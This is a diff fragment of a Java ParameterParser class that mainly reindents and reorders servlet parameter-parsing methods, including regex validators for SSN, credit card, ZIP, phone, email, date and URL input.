 	{
-	    return getSubParameter(first, next);
+		if (request == null)
+		{
+			return (null);
+		}
+
+		return request.getParameterNames();
 	}
-	catch (Exception e)
+
+	/**
+	 * Gets the parameterValues attribute of the ParameterParser object
+	 * 
+	 * @param name
+	 *            Description of the Parameter
+	 * @return The parameterValues value
+	 */
+	public String[] getParameterValues(String name)
 	{
-	    return def;
+		if (request == null)
+		{
+			return (null);
+		}
+
+		return request.getParameterValues(name);
 	}
-    }
 
-
-    /**
-     *  Gets the parameter named 'next' following the parameter 'first'. Presumes
-     *  the structure: first=firstvalue&next=nextValue
-     *
-     *@param  first                           Description of the Parameter
-     *@param  next                            Description of the Parameter
-     *@return                                 The subParameter value
-     *@exception  ParameterNotFoundException  Description of the Exception
-     */
-    public String getSubParameter(String first, String next)
-	    throws ParameterNotFoundException
-    {
-	String[] values = request.getParameterValues(first);
-	String value;
-
-	if (values == null)
+	/**
+	 * Gets the rawParameter attribute of the ParameterParser object
+	 * 
+	 * @param name
+	 *            Description of the Parameter
+	 * @param def
+	 *            Description of the Parameter
+	 * @return The rawParameter value
+	 */
+	public String getRawParameter(String name, String def)
 	{
-	    throw new ParameterNotFoundException(first + " not found");
+		try
+		{
+			return getRawParameter(name);
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
 	}
-	else if (values[0].length() == 0)
+
+	/**
+	 * Gets the rawParameter attribute of the ParameterParser object
+	 * 
+	 * @param name
+	 *            Description of the Parameter
+	 * @return The rawParameter value
+	 * @exception ParameterNotFoundException
+	 *                Description of the Exception
+	 */
+	public String getRawParameter(String name) throws ParameterNotFoundException
 	{
-	    throw new ParameterNotFoundException(first + " was empty");
+		String[] values = request.getParameterValues(name);
+
+		if (values == null)
+		{
+			throw new ParameterNotFoundException(name + " not found");
+		} else if (values[0].length() == 0)
+		{
+			throw new ParameterNotFoundException(name + " was empty");
+		}
+
+		return (values[0]);
 	}
-	else
+
+	/**
+	 * Gets the named parameter value as a short
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @return the parameter value as a short
+	 * @exception ParameterNotFoundException
+	 *                if the parameter was not found
+	 * @exception NumberFormatException
+	 *                if the parameter could not be converted to a short
+	 */
+	public short getShortParameter(String name) throws ParameterNotFoundException, NumberFormatException
 	{
-	    value = clean(values[0].trim());
-
-	    int idx = value.indexOf("&") + 1;
-
-	    // index of first char of first sub-param name
-	    if (idx == 0)
-	    {
-		throw new ParameterNotFoundException("No subparameter key");
-	    }
-
-	    value = value.substring(idx);
-
-	    //System.out.println("= = = = = =Parameter parser looking for " + next + " in " + value );
-	    int nextValueIndex = value.indexOf(next + "=");
-
-	    //System.out.println("= = = = = =Parameter parser nextValueIndex = " + nextValueIndex );
-	    if (nextValueIndex < 0)
-	    {
-		throw new ParameterNotFoundException("No subparameter value");
-	    }
-
-	    nextValueIndex += (next.length() + 1);
-
-	    if (nextValueIndex >= 0)
-	    {
-		value = value.substring(nextValueIndex);
-	    }
-	    else
-	    {
-		throw new ParameterNotFoundException(next + " not found");
-	    }
+		return Short.parseShort(getStringParameter(name));
 	}
 
-	if (value.indexOf("&") > 0)
+	/**
+	 * Gets the named parameter value as a short, with a default. Returns the
+	 * default value if the parameter is not found.
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @param def
+	 *            the default parameter value
+	 * @return the parameter value as a short, or the default
+	 */
+	public short getShortParameter(String name, short def)
 	{
-	    // truncate additional parameters that follow &
-	    value = value.substring(0, value.indexOf("&"));
+		try
+		{
+			return getShortParameter(name);
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
 	}
 
-	//System.out.println("=-=-=-=-=ParameterParser returning value " + value );
-	return value;
-    }
-
-
-    /**
-     *  Gets the wordParameter attribute of the ParameterParser object
-     *
-     *@param  name  Description of the Parameter
-     *@return       The wordParameter value
-     */
-    public String getWordParameter(String name)
-	    throws ParameterNotFoundException
-    {
-	String p = getStringParameter(name);
-	StringTokenizer st = new StringTokenizer(p);
-
-	return (st.nextToken().trim());
-    }
-
-
-    // FIXME: check for [a-zA-Z]
-
-    /**
-     *  Gets the wordParameter attribute of the ParameterParser object
-     *
-     *@param  name  Description of the Parameter
-     *@param  def   Description of the Parameter
-     *@return       The wordParameter value
-     */
-    public String getWordParameter(String name, String def)
-    {
-	try
+	/**
+	 * Gets the named parameter value as a String
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @return the parameter value as a String
+	 * @exception ParameterNotFoundException
+	 *                if the parameter was not found or was the empty string
+	 */
+	public String getStringParameter(String name) throws ParameterNotFoundException
 	{
-	    return getWordParameter(name);
+		String[] values = request.getParameterValues(name);
+		String value;
+
+		if (values == null)
+		{
+			throw new ParameterNotFoundException(name + " not found");
+		} else if (values[0].length() == 0)
+		{
+			throw new ParameterNotFoundException(name + " was empty");
+		} else
+		{
+			// trim illegal characters
+			value = clean(values[0].trim());
+
+			if (value.indexOf("&") > 0)
+			{
+				// truncate additional parameters that follow &
+				value = value.substring(0, value.indexOf("&"));
+			}
+
+			return value;
+		}
 	}
-	catch (Exception e)
+
+	/**
+	 * Gets the named parameter value as a String, with a default. Returns the
+	 * default value if the parameter is not found or is the empty string.
+	 * 
+	 * @param name
+	 *            the parameter name
+	 * @param def
+	 *            the default parameter value
+	 * @return the parameter value as a String, or the default
+	 */
+	public String getStringParameter(String name, String def)
 	{
-	    return def;
+		try
+		{
+			return getStringParameter(name);
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
 	}
-    }
 
-
-    /**
-     * Gets the specified parameter from the request and validates it against the provided regular expression. 
-     * If the regular expression check fails, the default value is returned instead. 
-     *
-     *@param  name  		The name of the parameter to retrieve from the request.
-     *@param  def   		The default value of the parameter.
-     *@param  regexpattern	The precompiled regular expression to be used to validate the parameter.
-     *@return       The validated parameter value, or the default value if validation failed.
-     */
-    private String getRegexParameter(String name, String def,
-	    Pattern regexpattern) throws ValidationException
-    {
-	try
+	/**
+	 * Gets the subParameter attribute of the ParameterParser object
+	 * 
+	 * @param first
+	 *            Description of the Parameter
+	 * @param next
+	 *            Description of the Parameter
+	 * @param def
+	 *            Description of the Parameter
+	 * @return The subParameter value
+	 */
+	public String getSubParameter(String first, String next, String def)
 	{
-	    return getRegexParameter(name, regexpattern);
+		try
+		{
+			return getSubParameter(first, next);
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
 	}
-	catch (Exception e)
+
+	/**
+	 * Gets the parameter named 'next' following the parameter 'first'. Presumes
+	 * the structure: first=firstvalue&next=nextValue
+	 * 
+	 * @param first
+	 *            Description of the Parameter
+	 * @param next
+	 *            Description of the Parameter
+	 * @return The subParameter value
+	 * @exception ParameterNotFoundException
+	 *                Description of the Exception
+	 */
+	public String getSubParameter(String first, String next) throws ParameterNotFoundException
 	{
-	    //System.out.println("Exception occured in defined pattern match");
-	    //e.printStackTrace();
-	    return def;
+		String[] values = request.getParameterValues(first);
+		String value;
+
+		if (values == null)
+		{
+			throw new ParameterNotFoundException(first + " not found");
+		} else if (values[0].length() == 0)
+		{
+			throw new ParameterNotFoundException(first + " was empty");
+		} else
+		{
+			value = clean(values[0].trim());
+
+			int idx = value.indexOf("&") + 1;
+
+			// index of first char of first sub-param name
+			if (idx == 0)
+			{
+				throw new ParameterNotFoundException("No subparameter key");
+			}
+
+			value = value.substring(idx);
+
+			// System.out.println("= = = = = =Parameter parser looking for " +
+			// next + " in " + value );
+			int nextValueIndex = value.indexOf(next + "=");
+
+			// System.out.println("= = = = = =Parameter parser nextValueIndex =
+			// " + nextValueIndex );
+			if (nextValueIndex < 0)
+			{
+				throw new ParameterNotFoundException("No subparameter value");
+			}
+
+			nextValueIndex += (next.length() + 1);
+
+			if (nextValueIndex >= 0)
+			{
+				value = value.substring(nextValueIndex);
+			} else
+			{
+				throw new ParameterNotFoundException(next + " not found");
+			}
+		}
+
+		if (value.indexOf("&") > 0)
+		{
+			// truncate additional parameters that follow &
+			value = value.substring(0, value.indexOf("&"));
+		}
+
+		// System.out.println("=-=-=-=-=ParameterParser returning value " +
+		// value );
+		return value;
 	}
-    }
 
-
-    /**
-     * Gets the specified parameter from the request and validates it against the provided regular expression. 
-     * If the regular expression check fails, the default value is returned instead. 
-     *
-     *@param  name  		The name of the parameter to retrieve from the request.
-     *@param  def   		The default value of the parameter.
-     *@param  regexpattern	The precompiled regular expression to be used to validate the parameter.
-     *@return       The validated parameter value, or the default value if validation failed.
-     */
-    private String getRegexParameter(String name, Pattern regexpattern)
-	    throws ParameterNotFoundException, ValidationException
-    {
-	String param = getStringParameter(name);
-
-	if (regexpattern.matcher(param).matches())
+	/**
+	 * Gets the wordParameter attribute of the ParameterParser object
+	 * 
+	 * @param name
+	 *            Description of the Parameter
+	 * @return The wordParameter value
+	 */
+	public String getWordParameter(String name) throws ParameterNotFoundException
 	{
-	    return param;
+		String p = getStringParameter(name);
+		StringTokenizer st = new StringTokenizer(p);
+
+		return (st.nextToken().trim());
 	}
-	else
+
+	// FIXME: check for [a-zA-Z]
+
+	/**
+	 * Gets the wordParameter attribute of the ParameterParser object
+	 * 
+	 * @param name
+	 *            Description of the Parameter
+	 * @param def
+	 *            Description of the Parameter
+	 * @return The wordParameter value
+	 */
+	public String getWordParameter(String name, String def)
 	{
-	    //System.out.println(param + " didn't match defined pattern.");
-	    throw new ValidationException(name + " contained an invalid value");
+		try
+		{
+			return getWordParameter(name);
+		}
+		catch (Exception e)
+		{
+			return def;
+		}
 	}
-    }
 
-
-    public String getStrictAlphaParameter(String name, int maxLength)
-	    throws ParameterNotFoundException, ValidationException
-    {
-	String alphaRegEx = "^[a-zA-Z\\s]{0," + maxLength + "}$";
-	Pattern alphaPattern = Pattern.compile(alphaRegEx);
-
-	return getRegexParameter(name, alphaPattern);
-    }
-
-
-    public String getStrictNumericParameter(String name, int maxLength)
-	    throws ParameterNotFoundException, ValidationException
-    {
-	String numericRegEx = "^\\d{0," + maxLength + "}$";
-	Pattern numericPattern = Pattern.compile(numericRegEx);
-
-	return getRegexParameter(name, numericPattern);
-    }
-
-    private static final String SSNREGEX = "^\\d{3}-\\d{2}-\\d{4}$";
-
-    private static final Pattern Ssnpattern = Pattern.compile(SSNREGEX);
-
-
-    public String getSsnParameter(String name)
-	    throws ParameterNotFoundException, ValidationException
-    {
-	return getRegexParameter(name, Ssnpattern);
-    }
-
-    // Validates format for major brands of credit card.
-    //private static final String CCNREGEX = "^(?:(?<Visa>4\\d{3})|(?<Mastercard>5[1-5]\\d{2})|(?<Discover>6011)|(?<DinersClub>(?:3[68]\\d{2})|(?:30[0-5]\\d))|(?<AmericanExpress>3[47]\\d{2}))([ -]?)(?(DinersClub)(?:\\d{6}\\1\\d{4})|(?(AmericanExpress)(?:\\d{6}\\1\\d{5})|(?:\\d{4}\\1\\d{4}\\1\\d{4})))$";
-    private static final String CCNREGEX = "^\\d{16}$";
-
-    private static final Pattern Ccnpattern = Pattern.compile(CCNREGEX);
-
-
-    public String getCcnParameter(String name)
-	    throws ParameterNotFoundException, ValidationException
-    {
-	return getRegexParameter(name, Ccnpattern);
-    }
-
-    private static final String ZIPREGEX = "^\\d{5}(-\\d{4})?$";
-
-    private static final Pattern Zippattern = Pattern.compile(ZIPREGEX);
-
-
-    public String getZipParameter(String name)
-	    throws ParameterNotFoundException, ValidationException
-    {
-	return getZipParameter(name, null);
-    }
-
-
-    public String getZipParameter(String name, String def)
-	    throws ValidationException
-    {
-	return getRegexParameter(name, def, Zippattern);
-    }
-
-    private static final String PHONEREGEX = "^\\(?[\\d]{3}\\)?[\\s-]?[\\d]{3}[\\s-]?[\\d]{4}$";
-
-    // Or this more forgiving pattern:
-    //private static final String PHONEREGEX = "^([\\-()+ 0-9x])+$";
-    private static final Pattern phonepattern = Pattern.compile(PHONEREGEX);
-
-
-    public String getPhoneParameter(String name)
-	    throws ParameterNotFoundException, ValidationException
-    {
-	return getPhoneParameter(name, null);
-    }
-
-
-    public String getPhoneParameter(String name, String def)
-	    throws ValidationException
-    {
-	return getRegexParameter(name, def, phonepattern);
-    }
-
-    private static final String EMAILREGEX = "^[\\w-]+(?:\\.[\\w-]+)*@(?:[\\w-]+\\.)+[a-zA-Z]{2,7}$";
-
-    private static final Pattern emailpattern = Pattern.compile(EMAILREGEX);
-
-
-    public String getEMailParameter(String name)
-	    throws ParameterNotFoundException, ValidationException
-    {
-	return getEMailParameter(name, null);
-    }
-
-
-    public String getEMailParameter(String name, String def)
-	    throws ValidationException
-    {
-	return getRegexParameter(name, def, emailpattern);
-    }
-
-    private static final String DATEREGEX = "([\\/ .,:0-9a-zA-Z])+$";
-
-    private static final Pattern datepattern = Pattern.compile(DATEREGEX);
-
-
-    public String getDateParameter(String name)
-	    throws ParameterNotFoundException, ValidationException
-    {
-	return getDateParameter(name, null);
-    }
-
-
-    public String getDateParameter(String name, String def)
-	    throws ValidationException
-    {
-	return getRegexParameter(name, def, datepattern);
-    }
-
-    private static final String URLREGEX = "^(((https?)://)([-()_.!~*';/?:@&=+$,A-Za-z0-9])+)([).!';/?:,][[:blank:]])?$";
-
-    private static final Pattern URLpattern = Pattern.compile(URLREGEX);
-
-
-    public String getURLParameter(String name)
-	    throws ParameterNotFoundException, ValidationException
-    {
-	return getURLParameter(name, null);
-    }
-
-
-    public String getURLParameter(String name, String def)
-	    throws ValidationException
-    {
-	return getRegexParameter(name, def, URLpattern);
-    }
-
-
-    protected static String htmlEncode(String s)
-    {
-	return HtmlEncoder.encode(s);
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     *@return    Description of the Return Value
-     */
-    public String toString()
-    {
-	StringBuffer s = new StringBuffer("[");
-	Enumeration e = getParameterNames();
-
-	while (e.hasMoreElements())
+	/**
+	 * Gets the specified parameter from the request and validates it against
+	 * the provided regular expression. If the regular expression check fails,
+	 * the default value is returned instead.
+	 * 
+	 * @param name
+	 *            The name of the parameter to retrieve from the request.
+	 * @param def
+	 *            The default value of the parameter.
+	 * @param regexpattern
+	 *            The precompiled regular expression to be used to validate the
+	 *            parameter.
+	 * @return The validated parameter value, or the default value if validation
+	 *         failed.
+	 */
+	private String getRegexParameter(String name, String def, Pattern regexpattern) throws ValidationException
 	{
-	    String key = (String) e.nextElement();
-	    s.append(key + "=" + getParameterValues(key)[0]);
-
-	    // FIXME: Other values?
-	    if (e.hasMoreElements())
-	    {
-		s.append(",");
-	    }
+		try
+		{
+			return getRegexParameter(name, regexpattern);
+		}
+		catch (Exception e)
+		{
+			// System.out.println("Exception occured in defined pattern match");
+			// e.printStackTrace();
+			return def;
+		}
 	}
 
-	s.append("]");
+	/**
+	 * Gets the specified parameter from the request and validates it against
+	 * the provided regular expression. If the regular expression check fails,
+	 * the default value is returned instead.
+	 * 
+	 * @param name
+	 *            The name of the parameter to retrieve from the request.
+	 * @param def
+	 *            The default value of the parameter.
+	 * @param regexpattern
+	 *            The precompiled regular expression to be used to validate the
+	 *            parameter.
+	 * @return The validated parameter value, or the default value if validation
+	 *         failed.
+	 */
+	private String getRegexParameter(String name, Pattern regexpattern) throws ParameterNotFoundException,
+																	   ValidationException
+	{
+		String param = getStringParameter(name);
 
-	return (s.toString());
-    }
+		if (regexpattern.matcher(param).matches())
+		{
+			return param;
+		} else
+		{
+			// System.out.println(param + " didn't match defined pattern.");
+			throw new ValidationException(name + " contained an invalid value");
+		}
+	}
 
+	public String getStrictAlphaParameter(String name, int maxLength) throws ParameterNotFoundException,
+																	 ValidationException
+	{
+		String alphaRegEx = "^[a-zA-Z\\s]{0," + maxLength + "}$";
+		Pattern alphaPattern = Pattern.compile(alphaRegEx);
 
-    /**
-     *  Description of the Method
-     *
-     *@param  request  Description of the Parameter
-     */
-    public void update(ServletRequest request)
-    {
-	this.request = request;
-    }
+		return getRegexParameter(name, alphaPattern);
+	}
+
+	public String getStrictNumericParameter(String name, int maxLength) throws ParameterNotFoundException,
+																	   ValidationException
+	{
+		String numericRegEx = "^\\d{0," + maxLength + "}$";
+		Pattern numericPattern = Pattern.compile(numericRegEx);
+
+		return getRegexParameter(name, numericPattern);
+	}
+
+	private static final String SSNREGEX = "^\\d{3}-\\d{2}-\\d{4}$";
+
+	private static final Pattern Ssnpattern = Pattern.compile(SSNREGEX);
+
+	public String getSsnParameter(String name) throws ParameterNotFoundException, ValidationException
+	{
+		return getRegexParameter(name, Ssnpattern);
+	}
+
+	// Validates format for major brands of credit card.
+	// private static final String CCNREGEX =
+	// "^(?:(?<Visa>4\\d{3})|(?<Mastercard>5[1-5]\\d{2})|(?<Discover>6011)|(?<DinersClub>(?:3[68]\\d{2})|(?:30[0-5]\\d))|(?<AmericanExpress>3[47]\\d{2}))([
+	// -]?)(?(DinersClub)(?:\\d{6}\\1\\d{4})|(?(AmericanExpress)(?:\\d{6}\\1\\d{5})|(?:\\d{4}\\1\\d{4}\\1\\d{4})))$";
+	private static final String CCNREGEX = "^\\d{16}$";
+
+	private static final Pattern Ccnpattern = Pattern.compile(CCNREGEX);
+
+	public String getCcnParameter(String name) throws ParameterNotFoundException, ValidationException
+	{
+		return getRegexParameter(name, Ccnpattern);
+	}
+
+	private static final String ZIPREGEX = "^\\d{5}(-\\d{4})?$";
+
+	private static final Pattern Zippattern = Pattern.compile(ZIPREGEX);
+
+	public String getZipParameter(String name) throws ParameterNotFoundException, ValidationException
+	{
+		return getZipParameter(name, null);
+	}
+
+	public String getZipParameter(String name, String def) throws ValidationException
+	{
+		return getRegexParameter(name, def, Zippattern);
+	}
+
+	private static final String PHONEREGEX = "^\\(?[\\d]{3}\\)?[\\s-]?[\\d]{3}[\\s-]?[\\d]{4}$";
+
+	// Or this more forgiving pattern:
+	// private static final String PHONEREGEX = "^([\\-()+ 0-9x])+$";
+	private static final Pattern phonepattern = Pattern.compile(PHONEREGEX);
+
+	public String getPhoneParameter(String name) throws ParameterNotFoundException, ValidationException
+	{
+		return getPhoneParameter(name, null);
+	}
+
+	public String getPhoneParameter(String name, String def) throws ValidationException
+	{
+		return getRegexParameter(name, def, phonepattern);
+	}
+
+	private static final String EMAILREGEX = "^[\\w-]+(?:\\.[\\w-]+)*@(?:[\\w-]+\\.)+[a-zA-Z]{2,7}$";
+
+	private static final Pattern emailpattern = Pattern.compile(EMAILREGEX);
+
+	public String getEMailParameter(String name) throws ParameterNotFoundException, ValidationException
+	{
+		return getEMailParameter(name, null);
+	}
+
+	public String getEMailParameter(String name, String def) throws ValidationException
+	{
+		return getRegexParameter(name, def, emailpattern);
+	}
+
+	private static final String DATEREGEX = "([\\/ .,:0-9a-zA-Z])+$";
+
+	private static final Pattern datepattern = Pattern.compile(DATEREGEX);
+
+	public String getDateParameter(String name) throws ParameterNotFoundException, ValidationException
+	{
+		return getDateParameter(name, null);
+	}
+
+	public String getDateParameter(String name, String def) throws ValidationException
+	{
+		return getRegexParameter(name, def, datepattern);
+	}
+
+	private static final String URLREGEX =
+			"^(((https?)://)([-()_.!~*';/?:@&=+$,A-Za-z0-9])+)([).!';/?:,][[:blank:]])?$";
+
+	private static final Pattern URLpattern = Pattern.compile(URLREGEX);
+
+	public String getURLParameter(String name) throws ParameterNotFoundException, ValidationException
+	{
+		return getURLParameter(name, null);
+	}
+
+	public String getURLParameter(String name, String def) throws ValidationException
+	{
+		return getRegexParameter(name, def, URLpattern);
+	}
+
+	protected static String htmlEncode(String s)
+	{
+		return HtmlEncoder.encode(s);
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @return Description of the Return Value
+	 */
+	public String toString()
+	{
+		StringBuffer s = new StringBuffer("[");
+		Enumeration e = getParameterNames();
+
+		while (e.hasMoreElements())
+		{
+			String key = (String) e.nextElement();
+			s.append(key + "=" + getParameterValues(key)[0]);
+
+			// FIXME: Other values?
+			if (e.hasMoreElements())
+			{
+				s.append(",");
+			}
+		}
+
+		s.append("]");
+
+		return (s.toString());
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param request
+	 *            Description of the Parameter
+	 */
+	public void update(ServletRequest request)
+	{
+		this.request = request;
+	}
 }
